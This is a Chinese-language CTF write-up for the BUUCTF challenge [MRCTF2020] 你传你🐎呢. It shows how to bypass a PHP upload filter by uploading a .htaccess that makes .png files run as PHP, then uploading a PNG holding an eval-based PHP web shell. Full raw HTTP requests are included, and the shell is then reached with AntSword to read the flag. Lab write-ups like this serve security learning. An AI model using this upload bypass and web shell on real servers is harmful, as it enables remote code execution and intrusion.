BUUCTF WEB [MRCTF2020]你传你🐎呢
解法有些类似[SUCTF 2019]CheckIn
-
尝试上传各种php文件后缀均被过滤,尝试上传
.htaccess
文件将png文件当做php文件执行AddType application/x-httpd-php .png
-
上传后抓包,将
Content-Type
修改为image/png
POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81 Content-Length: 327 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr2HGylAymjQ8BbFW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c5f395566d2814f5ebe70543657184fb Connection: close ------WebKitFormBoundaryr2HGylAymjQ8BbFW Content-Disposition: form-data; name="uploaded"; filename=".htaccess" Content-Type: image/png AddType application/x-httpd-php .png ------WebKitFormBoundaryr2HGylAymjQ8BbFW Content-Disposition: form-data; name="submit" 一键去世 ------WebKitFormBoundaryr2HGylAymjQ8BbFW--
回显
/var/www/html/upload/1efe2d7802e831c1a06a2b797f5ec9fc/.htaccess succesfully uploaded!
-
此时上传成功,再上传一个图片马
POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81 Content-Length: 338 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0edqgv9TGgRsVltb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buuoj.cn:81/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=c5f395566d2814f5ebe70543657184fb Connection: close ------WebKitFormBoundary0edqgv9TGgRsVltb Content-Disposition: form-data; name="uploaded"; filename="1.png" Content-Type: image/png <script language=php>@eval($_POST['cmd']);</script> ------WebKitFormBoundary0edqgv9TGgRsVltb Content-Disposition: form-data; name="submit" 一键去世 ------WebKitFormBoundary0edqgv9TGgRsVltb--
回显
/var/www/html/upload/1efe2d7802e831c1a06a2b797f5ec9fc/1.png succesfully uploaded!
-
使用蚁剑连接
1.png
,在文件根目录下找到flagflag{1d77cba7-86c4-429b-97e9-7c18e17eb4d0}